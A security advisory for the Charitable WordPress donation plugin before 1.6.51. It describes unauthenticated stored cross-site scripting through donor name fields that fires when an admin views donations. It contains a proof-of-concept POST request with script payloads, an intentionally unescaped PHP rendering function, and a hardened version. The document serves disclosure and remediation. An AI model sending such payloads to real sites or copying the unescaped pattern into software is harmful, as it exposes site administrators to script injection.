WordPress Plugin Vulnerabilities

Charitable - Donation Plugin < 1.6.51 - Unauthenticated Stored Cross-Site Scripting

Description

While fixing an Authenticated Stored Cross-Site Scripting issue (https://wpscan.com/vulnerability/a5837621-ee6e-4876-9f65-82658fc0341f), the vendor identified another Cross-Site Scripting issue that could be exploited by unauthenticated users and is triggered in the context of a logged-in admin.

Proof of Concept

Submit a donation (as an unauthenticated user) with <script>alert(/XSS/)</script> as the First Name or Last Name, then view the donations list as admin to trigger the XSS.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 501
Connection: close
charitable_form_id=60f1bb21849de&60f1bb21849de=&_charitable_donation_nonce=dd32c048d6&_wp_http_referer=%2Fwordpress%2Fcampaigns%2Ftest%2Fdonate%2F&campaign_id=1148&description=Test&ID=0&gateway=offline&custom_donation_amount=1.00&first_name=test%22%3E%3Cscript%3Ealert(%2FXSS-FN%2F)%3C%2Fscript%3E&last_name=test%22%3E%3Cscript%3Ealert(%2FXSS-LN%2F)%3C%2Fscript%3E&email=fjrekhg%40nferhf.com&address=&address_2=&city=&state=&postcode=&country=AF&phone=&action=make_donation&form_action=make_donation
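The root cause is donor-supplied text reaching the admin donations list without output escaping. Below is an added example of the vulnerable rendering pattern beside its hardened form, written for this advisory and not taken from the plugin's own code; the function names, the donation array keys and the edit URL are assumptions, and it relies on the WordPress escaping helpers being loaded.

```php
<?php
// Added example, not the plugin's code: how a donor name stored from the
// unauthenticated make_donation request should be rendered in the admin
// donations list. Assumes WordPress is loaded (esc_html, esc_attr, esc_url,
// sanitize_text_field, wp_unslash); function names and array keys are hypothetical.

// Vulnerable pattern: the stored first/last name is echoed straight into HTML.
// A donation with first_name = test"><script>alert(/XSS-FN/)</script> closes the
// title attribute and runs the script when an administrator views the list.
function charitable_example_donor_cell_vulnerable( array $donation ) {
    $name = $donation['first_name'] . ' ' . $donation['last_name'];
    return '<a href="' . $donation['edit_url'] . '" title="' . $name . '">' . $name . '</a>';
}

// Hardened pattern: escape at the point of output, with the escaper that matches
// each context (URL, attribute value, text node).
function charitable_example_donor_cell_safe( array $donation ) {
    $name = trim( $donation['first_name'] . ' ' . $donation['last_name'] );
    return sprintf(
        '<a href="%s" title="%s">%s</a>',
        esc_url( $donation['edit_url'] ),
        esc_attr( $name ),
        esc_html( $name )
    );
}

// Defence in depth on the way in: normalise the submitted name fields before they
// are stored. This does not replace output escaping; records already in the
// database from before the fix are only made safe by the escaping above.
function charitable_example_sanitize_donor_fields( array $posted ) {
    return array(
        'first_name' => sanitize_text_field( wp_unslash( $posted['first_name'] ?? '' ) ),
        'last_name'  => sanitize_text_field( wp_unslash( $posted['last_name'] ?? '' ) ),
    );
}

// Constructed donation record mirroring the advisory's proof-of-concept request body.
$donation = array(
    'edit_url'   => 'https://example.com/wp-admin/admin.php?page=charitable-donations&donation_id=1',
    'first_name' => 'test"><script>alert(/XSS-FN/)</script>',
    'last_name'  => 'test"><script>alert(/XSS-LN/)</script>',
);
echo charitable_example_donor_cell_safe( $donation ); // angle brackets and quotes are emitted as HTML entities
```

When auditing a fix like 1.6.51, check every place the donor name is printed (list table columns, edit screens, e-mail templates) rather than a single view, since the stored value is the same in each.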

Affects Plugins

Fixed in 1.6.51

Classification

Type
XSS

Miscellaneous

Original Researcher
Eric Daams
Verified
Yes

Timeline

Publicly Published
2021-07-21
Added
2021-07-21
Last Updated
2021-08-10